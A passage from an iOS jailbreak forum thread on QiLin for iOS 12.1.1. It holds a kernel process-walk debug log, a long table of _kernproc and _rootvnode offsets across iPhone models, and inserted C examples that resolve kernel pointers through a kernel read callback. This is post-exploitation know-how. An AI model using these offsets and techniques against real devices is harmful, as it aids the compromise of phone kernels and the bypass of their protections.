2019-02-13 15:47:26.081542+0100 v3ntex[195:2838] DEBUG: Process 139@0xfffffff003d89be8 - mobile_assertion
2019-02-13 15:47:26.081577+0100 v3ntex[195:2838] DEBUG: Process 140@0xfffffff003d89000 - notification_pro
2019-02-13 15:47:26.081610+0100 v3ntex[195:2838] DEBUG: Process 141@0xfffffff003f4d3f8 - softwareupdatese
2019-02-13 15:47:26.081644+0100 v3ntex[195:2838] DEBUG: Process 142@0xfffffff003f4d7f0 - captiveagent
2019-02-13 15:47:26.081677+0100 v3ntex[195:2838] DEBUG: Process 143@0xfffffff003f4d000 - deleted
2019-02-13 15:47:26.081711+0100 v3ntex[195:2838] DEBUG: Process 144@0xfffffff003f4dbe8 - com.apple.Mobile
2019-02-13 15:47:26.081823+0100 v3ntex[195:2838] DEBUG: Process 145@0xfffffff0041607f0 - com.apple.Mobile
2019-02-13 15:47:26.081857+0100 v3ntex[195:2838] DEBUG: Process 146@0xfffffff0041603f8 - com.apple.Mobile
2019-02-13 15:47:26.081891+0100 v3ntex[195:2838] DEBUG: Process 147@0xfffffff004160be8 - xpcroleaccountd
2019-02-13 15:47:26.081924+0100 v3ntex[195:2838] DEBUG: Process 148@0xfffffff004160000 - mobile_storage_p
2019-02-13 15:47:26.081958+0100 v3ntex[195:2838] DEBUG: Process 149@0xfffffff0043297f0 - pipelined
2019-02-13 15:47:26.081991+0100 v3ntex[195:2838] DEBUG: Process 150@0xfffffff0043293f8 - voiced
2019-02-13 15:47:26.082024+0100 v3ntex[195:2838] DEBUG: Process 151@0xfffffff004329000 - vmd
2019-02-13 15:47:26.082057+0100 v3ntex[195:2838] DEBUG: Process 152@0xfffffff004329be8 - com.apple.CallKi
2019-02-13 15:47:26.082091+0100 v3ntex[195:2838] DEBUG: Process 153@0xfffffff0044993f8 - itunesstored
2019-02-13 15:47:26.082124+0100 v3ntex[195:2838] DEBUG: Process 154@0xfffffff0044997f0 - appstored
2019-02-13 15:47:26.082217+0100 v3ntex[195:2838] DEBUG: Process 155@0xfffffff004499be8 - bookassetd
2019-02-13 15:47:26.082251+0100 v3ntex[195:2838] DEBUG: Process 156@0xfffffff004499000 - fmfd
2019-02-13 15:47:26.082295+0100 v3ntex[195:2838] DEBUG: Process 157@0xfffffff004519000 - suggestd
2019-02-13 15:47:26.082327+0100 v3ntex[195:2838] DEBUG: Process 158@0xfffffff0045193f8 - installcoordinat
2019-02-13 15:47:26.082361+0100 v3ntex[195:2838] DEBUG: Process 159@0xfffffff0045197f0 - backupd
2019-02-13 15:47:26.082394+0100 v3ntex[195:2838] DEBUG: Process 160@0xfffffff004519be8 - familycircled
2019-02-13 15:47:26.082564+0100 v3ntex[195:2838] DEBUG: Process 164@0xfffffff0045153f8 - searchd
2019-02-13 15:47:26.082612+0100 v3ntex[195:2838] DEBUG: Process 166@0xfffffff004515000 - AGXCompilerServi
2019-02-13 15:47:26.083225+0100 v3ntex[195:2838] DEBUG: Process 167@0xfffffff004515be8 - networkservicepr
fr3nsis
 
Posts: 3
Joined: Tue Jan 15, 2019 8:56 am
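
Added example (C, not QiLin's or either poster's code) illustrating two things from this thread: the symbol-table search that must skip a null entry rather than stop at it (saltthehash's report above), and fr3nsis's finding that the working value for _kernproc is the address of the global holding the proc pointer, not the proc struct's unslid address. The table rows, the "BOARD?" placeholders, set_kernel_symbol/find_symbol/resolve_kernproc and the fake kernel window are all the example's own; the addresses and the p_comm offset 0x250 are taken from the logs above.

```c
/* Added example, not QiLin's own code: a symbol table in the
 * {version, device, board, symbol, address} shape the toolkit uses, a lookup
 * that skips null addresses instead of stopping at them, and a kernproc
 * resolver that treats the table value as the address of the _kernproc
 * global (a pointer to the proc struct), not the struct itself.
 * Table rows, board ids and the fake kernel window are constructed. */
#include <stdint.h>
#include <string.h>

struct ksym {
    const char *version, *device, *board, *symbol;
    uint64_t address;          /* unslid address of the global; 0 = unknown */
};

/* Constructed table. Row 0 has a null address, the shape of the bug reported
 * above: a lookup that breaks on the first 0 never reaches rows 1 and 2. */
static const struct ksym sample_table[] = {
    { "12.1.2", "iPod7,2",    "BOARD?", "_kernproc", 0 },
    { "12.1.1", "iPhone6,2",  "BOARD?", "_kernproc", 0xfffffff0088b5ef8ULL },
    { "12.1.1", "iPhone10,6", "D221AP", "_kernproc", 0xfffffff0076660d8ULL },
};
#define TABLE_LEN (sizeof sample_table / sizeof sample_table[0])

/* Explicit overrides (the no-patching workaround): an override wins over the table. */
#define MAX_OVERRIDES 8
static struct { char symbol[32]; uint64_t address; } overrides[MAX_OVERRIDES];
static int n_overrides;

int set_kernel_symbol(const char *symbol, uint64_t address)
{
    if (n_overrides == MAX_OVERRIDES || strlen(symbol) >= sizeof overrides[0].symbol)
        return -1;
    strcpy(overrides[n_overrides].symbol, symbol);
    overrides[n_overrides].address = address;
    n_overrides++;
    return 0;
}

/* Returns the unslid address of the symbol's global, or 0 if unknown. Board is
 * carried but not matched here; QiLin's own matching rule may differ. */
uint64_t find_symbol(const char *version, const char *device, const char *symbol)
{
    for (int i = 0; i < n_overrides; i++)
        if (strcmp(overrides[i].symbol, symbol) == 0)
            return overrides[i].address;
    for (size_t i = 0; i < TABLE_LEN; i++) {
        const struct ksym *e = &sample_table[i];
        if (e->address == 0)
            continue;           /* unknown row: keep searching, do not break */
        if (!strcmp(e->version, version) && !strcmp(e->device, device) &&
            !strcmp(e->symbol, symbol))
            return e->address;
    }
    return 0;
}

/* Kernel read callback; returns 0 on failure (the "(os/kern) invalid address" case). */
typedef int (*kread_fn)(uint64_t addr, void *out, size_t len);

#define OFF_P_COMM 0x250       /* offset of p_comm in struct proc, from the log above */

/* sym_unslid + slide is where the _kernproc POINTER lives: dereference it once,
 * then confirm the proc it names really is kernel_task before trusting it. */
uint64_t resolve_kernproc(uint64_t sym_unslid, uint64_t slide, kread_fn kread)
{
    uint64_t proc = 0;
    char comm[17] = { 0 };
    if (!kread(sym_unslid + slide, &proc, sizeof proc) || proc == 0)
        return 0;
    if (!kread(proc + OFF_P_COMM, comm, 16) || strcmp(comm, "kernel_task") != 0)
        return 0;               /* wrong symbol or slide: refuse rather than scribble */
    return proc;
}

/* Constructed 4 KiB window of "kernel memory" laid out like fr3nsis's log: the proc
 * at 0xfffffff01e2b5b00 (p_comm "kernel_task" at +0x250) and the _kernproc global at
 * unslid 0xfffffff0088b5ef8 + slide 0x15a00000 holding that proc's address. Passing
 * the unslid struct address (0xfffffff0088b5b00) instead reads the struct's first 8
 * bytes, which are zero in the dump, so resolve_kernproc() fails as the log did. */
#define IMG_BASE 0xfffffff01e2b5000ULL
#define SLIDE    0x15a00000ULL
static uint8_t fake_kernel[0x1000];
static int fake_built;

int fake_kread(uint64_t addr, void *out, size_t len)
{
    if (!fake_built) {
        uint64_t proc = 0xfffffff01e2b5b00ULL;
        uint64_t global = 0xfffffff0088b5ef8ULL + SLIDE;   /* 0xfffffff01e2b5ef8 */
        memcpy(fake_kernel + (global - IMG_BASE), &proc, sizeof proc);
        memcpy(fake_kernel + (proc - IMG_BASE) + OFF_P_COMM, "kernel_task", 12);
        fake_built = 1;
    }
    if (addr < IMG_BASE || addr + len > IMG_BASE + sizeof fake_kernel)
        return 0;
    memcpy(out, fake_kernel + (addr - IMG_BASE), len);
    return 1;
}
```

The p_comm check is the cheap guard a practitioner wants before using a resolved proc: a wrong slide or a struct-vs-pointer mix-up yields 0 or garbage rather than silently writing through a bad address.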

Re: QiLin now supports iOS 12.1.1

Postby morpheus » Thu Feb 14, 2019 2:30 am

So, explaining this kernproc etc issue:

The original QiLin could read symbols straight off the kernelcache. This was because AAPL forgot to sandbox access to /S/L/Caches, which held the kernel cache (and, fun fact, the apticket.der, which provided a unique identification of the device :-)). It was my fault for disclosing the bug (To my 17.x.x.x readers, thanks for not crediting the bug...).

QiLin will eventually be updated to get the symbols out of the kernel proper (because kernel_task can read from kernel_base). Till then, the short-term workaround which *requires no patching* is to simply call void setKernelSymbol (char *Symbol, uint64_t Address);

Now, I did put in offsets for kernproc for lots of architectures (thanks to @FCE365) but not all of them. When you do set a symbol, you need to set the global as would be exported by the kernel - which in kernproc's case is the POINTER TO. Hence the confusion in values. Presently defined offsets in QiLin are:

Code: Select all
//iOS 12.1.1 / 12.1.2 - iPhone XS / XS Max
{ "12.1.1", "iPhone11,2", "D331AP", "_kernproc", 0xfffffff00913c638},
{ "12.1.2", "iPhone11,6", "D331AP", "_kernproc", 0xfffffff00913c638},
{ "12.1.1", "iPhone11,6", "D331AP", "_kernproc", 0xfffffff00913c638},


{ "12.1.1", "iPhone10,6", "D221AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,6", "D221AP", "_kernproc", 0xfffffff0076660d8},

//iOS 12.1.1 - iPhone X
{ "12.1.1", "iPhone10,6", "D221AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,6", "D221AP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1 - iPhone X
{ "12.1", "iPhone10,6", "D221AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.1", "iPhone10,6", "D221AP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0.1 - iPhone X
{ "12.0.1", "iPhone10,6", "D221AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,6", "D221AP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0 - iPhone X
{ "12.0", "iPhone10,6", "D221AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,6", "D221AP", "_kernproc", 0xfffffff00766a0d8},

//iOS 12.1.2 - iPhone 8 Plus
{ "12.1.2", "iPhone10,5", "D211AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,5", "D211AP", "_kernproc", 0xfffffff0076660d8},
{ "12.1.2", "iPhone10,5", "D211AAP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,5", "D211AAP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1.1 - iPhone 8 Plus
{ "12.1.1", "iPhone10,5", "D211AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,5", "D211AP", "_kernproc", 0xfffffff0076660d8},
{ "12.1.1", "iPhone10,5", "D211AAP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,5", "D211AAP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1 - iPhone 8 Plus
{ "12.1", "iPhone10,5", "D211AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.1", "iPhone10,5", "D211AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.1", "iPhone10,5", "D211AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.1", "iPhone10,5", "D211AAP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0.1 - iPhone 8 Plus
{ "12.0.1", "iPhone10,5", "D211AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,5", "D211AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.0.1", "iPhone10,5", "D211AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,5", "D211AAP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0 - iPhone 8 Plus
{ "12.0", "iPhone10,5", "D211AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,5", "D211AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.0", "iPhone10,5", "D211AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,5", "D211AAP", "_kernproc", 0xfffffff00766a0d8},


//iOS 12.1.2 - iPhone 8
{ "12.1.2", "iPhone10,4", "D201AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,4", "D201AP", "_kernproc", 0xfffffff0076660d8},
{ "12.1.2", "iPhone10,4", "D201AAP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,4", "D201AAP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1.1 - iPhone 8
{ "12.1.1", "iPhone10,4", "D201AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,4", "D201AP", "_kernproc", 0xfffffff0076660d8},
{ "12.1.1", "iPhone10,4", "D201AAP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,4", "D201AAP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.0.1 - iPhone 8
{ "12.0.1", "iPhone10,4", "D201AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,4", "D201AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.0.1", "iPhone10,4", "D201AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,4", "D201AAP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0 - iPhone 8
{ "12.0", "iPhone10,4", "D201AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,4", "D201AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.0", "iPhone10,4", "D201AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,4", "D201AAP", "_kernproc", 0xfffffff00766a0d8},


//iOS 12.1.2 - iPhone X
{ "12.1.2", "iPhone10,3", "D22AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,3", "D22AP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1.1 - iPhone X
{ "12.1.1", "iPhone10,3", "D22AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,3", "D22AP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1 - iPhone X
{ "12.1", "iPhone10,3", "D22AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.1", "iPhone10,3", "D22AP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0.1 - iPhone X
{ "12.0.1", "iPhone10,3", "D22AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,3", "D22AP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0 - iPhone X
{ "12.0", "iPhone10,3", "D22AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,3", "D22AP", "_kernproc", 0xfffffff00766a0d8},


//iOS 12.1.2 - iPhone 8 Plus
{ "12.1.2", "iPhone10,2", "D21AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,2", "D21AP", "_kernproc", 0xfffffff0076660d8},

{ "12.1.2", "iPhone10,2", "D21AAP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,2", "D21AAP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1.1 - iPhone 8 Plus
{ "12.1.1", "iPhone10,2", "D21AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,2", "D21AP", "_kernproc", 0xfffffff0076660d8},
{ "12.1.1", "iPhone10,2", "D21AAP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,2", "D21AAP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1 - iPhone 8 Plus
{ "12.1", "iPhone10,2", "D21AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.1", "iPhone10,2", "D21AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.1", "iPhone10,2", "D21AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.1", "iPhone10,2", "D21AAP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0.1 - iPhone 8 Plus
{ "12.0.1", "iPhone10,2", "D21AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,2", "D21AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.0.1", "iPhone10,2", "D21AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,2", "D21AAP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0 - iPhone 8 Plus
{ "12.0", "iPhone10,2", "D21AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,2", "D21AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.0", "iPhone10,2", "D21AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,2", "D21AAP", "_kernproc", 0xfffffff00766a0d8},


//iOS 12.1.2 - iPhone 8
{ "12.1.2", "iPhone10,1", "D20AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,1", "D20AP", "_kernproc", 0xfffffff0076660d8},
{ "12.1.2", "iPhone10,1", "D20AAP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.2", "iPhone10,1", "D20AAP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1.1 - iPhone 8
{ "12.1.1", "iPhone10,1", "D20AP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,1", "D20AP", "_kernproc", 0xfffffff0076660d8},
{ "12.1.1", "iPhone10,1", "D20AAP", "_rootvnode", 0xfffffff0076660c0},
{ "12.1.1", "iPhone10,1", "D20AAP", "_kernproc", 0xfffffff0076660d8},
//iOS 12.1 - iPhone 8
{ "12.1", "iPhone10,1", "D20AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.1", "iPhone10,1", "D20AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.1", "iPhone10,1", "D20AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.1", "iPhone10,1", "D20AAP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0.1 - iPhone 8
{ "12.0.1", "iPhone10,1", "D20AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,1", "D20AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.0.1", "iPhone10,1", "D20AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0.1", "iPhone10,1", "D20AAP", "_kernproc", 0xfffffff00766a0d8},
//iOS 12.0 - iPhone 8
{ "12.0", "iPhone10,1", "D20AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,1", "D20AP", "_kernproc", 0xfffffff00766a0d8},
{ "12.0", "iPhone10,1", "D20AAP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.0", "iPhone10,1", "D20AAP", "_kernproc", 0xfffffff00766a0d8},


//iOS 12.1.2 - iPhone 7 Plus
{ "12.1.2", "iPhone9,4", "D111AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1.2", "iPhone9,4", "D111AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.1.1 - iPhone 7 Plus
{ "12.1.1", "iPhone9,4", "D111AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1.1", "iPhone9,4", "D111AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.1 - iPhone 7 Plus
{ "12.1", "iPhone9,4", "D111AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1", "iPhone9,4", "D111AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.0.1 - iPhone 7 Plus
{ "12.0.1", "iPhone9,4", "D111AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.0.1", "iPhone9,4", "D111AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.0 - iPhone 7 Plus
{ "12.0", "iPhone9,4", "D111AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.0", "iPhone9,4", "D111AP", "_kernproc", 0xfffffff0076420d0},


//iOS 12.1.2 - iPhone 7
{ "12.1.2", "iPhone9,3", "D101AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1.2", "iPhone9,3", "D101AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.1 - iPhone 7
{ "12.1", "iPhone9,3", "D101AP", "_rootvnode", 0xfffffff00766a0c0},
{ "12.1", "iPhone9,3", "D101AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.1.1 - iPhone 7
{ "12.1.1", "iPhone9,3", "D101AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1.1", "iPhone9,3", "D101AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.0.1 - iPhone 7
{ "12.0.1", "iPhone9,3", "D101AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.0.1", "iPhone9,3", "D101AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.0 - iPhone 7
{ "12.0", "iPhone9,3", "D101AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.0", "iPhone9,3", "D101AP", "_kernproc", 0xfffffff0076420d0},


//iOS 12.1.2 - iPhone 7 Plus
{ "12.1.2", "iPhone9,2", "D11AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1.2", "iPhone9,2", "D11AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.1.1 - iPhone 7 Plus
{ "12.1.1", "iPhone9,2", "D11AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1.1", "iPhone9,2", "D11AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.1 - iPhone 7 Plus
{ "12.1", "iPhone9,2", "D11AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1", "iPhone9,2", "D11AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.0.1 - iPhone 7 Plus
{ "12.0.1", "iPhone9,2", "D11AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.0.1", "iPhone9,2", "D11AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.0 - iPhone 7 Plus
{ "12.0", "iPhone9,2", "D11AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.0", "iPhone9,2", "D11AP", "_kernproc", 0xfffffff0076420d0},


//iOS 12.1.2 - iPhone 7
{ "12.1.2", "iPhone9,1", "D10AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1.2", "iPhone9,1", "D10AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.1.1 - iPhone 7
{ "12.1.1", "iPhone9,1", "D10AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1.1", "iPhone9,1", "D10AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.1 - iPhone 7
{ "12.1", "iPhone9,1", "D10AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.1", "iPhone9,1", "D10AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.0.1 - iPhone 7
{ "12.0.1", "iPhone9,1", "D10AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.0.1", "iPhone9,1", "D10AP", "_kernproc", 0xfffffff0076420d0},
//iOS 12.0 - iPhone 7
{ "12.0", "iPhone9,1", "D10AP", "_rootvnode", 0xfffffff0076420b8},
{ "12.0", "iPhone9,1", "D10AP", "_kernproc", 0xfffffff0076420d0},


//iOS 12.1.2 - iPhone SE
{ "12.1.2", "iPhone8,4", "N69AP", "_rootvnode", 0xfffffff0076020b8},
{ "12.1.2", "iPhone8,4", "N69AP", "_kernproc", 0xfffffff0076020d0},
{ "12.1.2", "iPhone8,4", "N69uAP", "_rootvnode", 0xfffffff0076020b8},
{ "12.1.2", "iPhone8,4", "N69uAP", "_kernproc", 0xfffffff0076020d0},
//iOS 12.1.1 - iPhone SE
{ "12.1.1", "iPhone8,4", "N69AP", "_rootvnode", 0xfffffff0076020b8},
{ "12.1.1", "iPhone8,4", "N69AP", "_kernproc", 0xfffffff0076020d0},
{ "12.1.1", "iPhone8,4", "N69uAP", "_rootvnode", 0xfffffff0076020b8},
{ "12.1.1", "iPhone8,4", "N69uAP", "_kernproc", 0xfffffff0076020d0},
//iOS 12.1 - iPhone SE
{ "12.1", "iPhone8,4", "N69AP", "_rootvnode", 0xfffffff0076020b8},
{ "12.1", "iPhone8,4", "N69AP", "_kernproc", 0xfffffff0076020d0},
{ "12.1", "iPhone8,4", "N69uAP", "_rootvnode", 0xfffffff0076020b8},
{ "12.1", "iPhone8,4", "N69uAP", "_kernproc", 0xfffffff0076020d0},
//iOS 12.0.1 - iPhone SE
{ "12.0.1", "iPhone8,4", "N69AP", "_rootvnode", 0xfffffff0076020b8},
{ "12.0.1", "iPhone8,4", "N69AP", "_kernproc", 0xfffffff0076020d0},
{ "12.0.1", "iPhone8,4", "N69uAP", "_rootvnode", 0xfffffff0076020b8},
{ "12.0.1", "iPhone8,4", "N69uAP", "_kernproc", 0xfffffff0076020d0},
//iOS 12.0 - iPhone SE
{ "12.0", "iPhone8,4", "N69AP", "_rootvnode", 0xfffffff0076020b8},
{ "12.0", "iPhone8,4", "N69AP", "_kernproc", 0xfffffff0076020d0},
{ "12.0", "iPhone8,4", "N69uAP", "_rootvnode", 0xfffffff0076020b8},
{ "12.0", "iPhone8,4", "N69uAP", "_kernproc", 0xfffffff0076020d0},



Also, jtool2 is one step away from another release and 5,000+ symbols, two of which will be _rootvnode and _kernproc..

So stay tuned..
morpheus
Site Admin
 
Posts: 723
Joined: Thu Apr 11, 2013 6:24 pm
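As an added illustration of the point about kernproc above (this is not morpheus's code and not part of QiLin): a lookup over rows shaped like the offsets table, followed by the dereference step that turns the address of the kernel's `kernproc` global into the proc pointer it holds. The kernel reader, the slide value 0x1000000 and the pointer values it returns are constructed stand-ins; only the four table rows are copied from the post.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Row layout of the QiLin offsets table quoted in the post above. */
typedef struct { const char *ver, *dev, *board, *sym; uint64_t addr; } sym_row_t;

/* Four rows copied from that table (iPhone X, D22AP); the real table is larger. */
static const sym_row_t offsets[] = {
    { "12.1.1", "iPhone10,3", "D22AP", "_rootvnode", 0xfffffff0076660c0ULL },
    { "12.1.1", "iPhone10,3", "D22AP", "_kernproc",  0xfffffff0076660d8ULL },
    { "12.1",   "iPhone10,3", "D22AP", "_rootvnode", 0xfffffff00766a0c0ULL },
    { "12.1",   "iPhone10,3", "D22AP", "_kernproc",  0xfffffff00766a0d8ULL },
};

/* Unslid address of a symbol for this build/device/board, or 0 if no row exists. */
uint64_t lookup_symbol(const char *ver, const char *dev, const char *board, const char *sym) {
    for (size_t i = 0; i < sizeof offsets / sizeof offsets[0]; i++) {
        const sym_row_t *r = &offsets[i];
        if (!strcmp(r->ver, ver) && !strcmp(r->dev, dev) &&
            !strcmp(r->board, board) && !strcmp(r->sym, sym))
            return r->addr;
    }
    return 0;
}

/* Constructed stand-in for a tfp0 kernel reader: a two-entry "memory" holding
   what the slid globals would contain on a device with kernel_slide 0x1000000.
   The values are made up; they exist only to show the dereference step. */
typedef uint64_t (*kread64_fn)(uint64_t kaddr);
uint64_t fake_kread64(uint64_t kaddr) {
    if (kaddr == 0xfffffff0076660d8ULL + 0x1000000) return 0xffffffe000123000ULL; /* kernproc   */
    if (kaddr == 0xfffffff0076660c0ULL + 0x1000000) return 0xffffffe000456000ULL; /* rootvnode  */
    return 0;
}

/* The table address is where the kernel's global lives (the variable `kernproc`
   or `rootvnode`), not the proc or vnode itself. To reach the object, slide the
   symbol address and read the 8-byte pointer stored there. */
uint64_t resolve_pointer_global(const char *ver, const char *dev, const char *board,
                                const char *sym, uint64_t kernel_slide, kread64_fn kread64) {
    uint64_t unslid = lookup_symbol(ver, dev, board, sym);
    if (unslid == 0) return 0;               /* no offset for this build: do not guess one */
    return kread64(unslid + kernel_slide);   /* dereference the slid global */
}
```

Passing the table address itself where a proc pointer is expected is exactly the value confusion the post describes; the extra read is what resolves it.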

Re: QiLin now supports iOS 12.1.1

Postby fr3nsis » Thu Feb 14, 2019 10:01 am

Thanks!
My problem with setKernelSymbol is a bad address ... now QiLin, as you said, works fine without the patch.
fr3nsis
 
Posts: 3
Joined: Tue Jan 15, 2019 8:56 am

